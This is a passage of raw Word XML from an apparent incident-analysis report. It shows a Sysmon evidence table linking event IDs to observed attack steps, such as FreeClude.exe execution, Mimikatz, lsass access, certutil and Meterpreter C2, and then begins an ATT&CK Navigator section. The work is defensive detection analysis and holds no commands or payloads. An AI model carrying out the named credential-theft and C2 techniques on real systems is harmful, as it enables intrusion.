    </w:p>
    <w:p w14:paraId="1E10680C">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A2D6229">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A8CB754">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D58860C">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F6FA29C">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592F350C">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15702161">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="415D249D">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5712E4C9">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5374DBEB">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55C08BAC">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E5B0C0D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>13 / TELEMETRY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0401CDBE">
      <w:pPr>
        <w:pStyle w:val="40"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Sysmon Evidence Matrix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30883377">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The endpoint telemetry should provide enough detail to reconstruct the attack as a continuous sequence rather than relying on a single event source. Each Sysmon event contributes a specific piece of evidence, while shared fields such as ProcessGuid, ProcessId, timestamp, user, image, and parent process allow events to be correlated across the attack timeline.</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2096"/>
        <w:gridCol w:w="3865"/>
        <w:gridCol w:w="2937"/>
      </w:tblGrid>
      <w:tr w14:paraId="5A4E6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299" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06419850">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p>
          <w:p w14:paraId="3059BD8F">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Sysmon ID</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CAC5D9C">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="cente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pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2096" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6CBB1CF1">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Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A10E271">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Role in This Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2937" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1CACFBAF">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="bg1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="bg1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>Primary Fields</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="217B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jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1299" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B8975AA">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="center"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2096" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FE86E3F">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Process Create</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0697CC3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Execution of </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>FreeClude.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">, discovery commands, account manipulation, scheduled-task creation, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>certutil.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>, and Mimikatz execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2937" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="547C7E58">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Image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CommandLine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ParentImage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ParentProcessId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ProcessGuid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User</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IntegrityLevel</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Hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="402F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jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1299" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4247475D">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="center"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2096" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4FC58313">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Network Connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CCD5D64">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Meterpreter C2 communication and network activity related to tool transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2937" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="498DE0FF">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Image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ProcessGuid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Protocol</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SourceIp</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SourcePort</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DestinationIp</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DestinationPort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="366D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jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1299" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09EA0482">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="center"/>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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2096" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E562B5A">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Image Loaded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="644E2C3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Supporting evidence for executable and DLL loading, including </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>FreeClude.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> and Task Scheduler components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2937" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="162C5CF3">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Image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ImageLoaded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ProcessGuid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Signed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SignatureStatus</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User</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6DD9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1299" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AE9ED05">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="center"/>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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2096" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="693C0FC6">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Process Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="123E5F6C">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Investigation of credential-access activity, especially possible access to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>lsass.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2937" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03430FE4">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SourceImage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SourceProcessId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TargetImage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TargetProcessId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GrantedAccess</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ProcessGuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5293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1299" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1227E5B8">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="center"/>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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2096" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="352632EB">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File Create</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C86A87B">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 xml:space="preserve">Confirms creation of downloaded or staged payloads such as </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>FreeClude.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> or other tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2937" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02A5E3C3">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Image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TargetFilename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ProcessGuid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User</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1DC3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299" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61EF747C">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="center"/>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12–14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2096" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E37C789">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Registry Events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2895F28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Supporting evidence for registry-based persistence, configuration changes, and Task Scheduler activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2937" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A5CC8CC">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EventType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TargetObject</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Details</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Image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ProcessGuid</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User</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="796F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jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1299" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C7A87ED">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="center"/>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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2096" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="073CFF99">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>File Create Stream Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A964941">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1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>Mark-of-the-Web and alternate data stream evidence associated with downloaded files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2937" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EE17A35">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>TargetFilename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Hash</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Contents</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Image</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>ProcessGuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="310A2C5B">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18D7E857">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B65F4CD">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F4B1E0F">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E8C7ED3">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65D6E84E">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11843692">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DFD5B8C">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592C9C4B">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F84D2ED">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47FD73C9">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA209B5">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C766760">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AECED21">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">14 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>/ NAVIGATOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565DF7DD">
      <w:pPr>
        <w:pStyle w:val="40"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>ATT&amp;CK Navigator — Import and Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1258BB23">
      <w:pPr>
        <w:pStyle w:val="36"/>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The ATT&amp;CK Navigator layer is provided with this report to enable analysts to transition from the detailed evidence presented in the document to an interactive ATT&amp;CK technique matrix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53451B9F">
      <w:pPr>
        <w:pStyle w:val="36"/>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layer is stored in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JSON format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, as required by MITRE ATT&amp;CK Navigator. It is configured for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
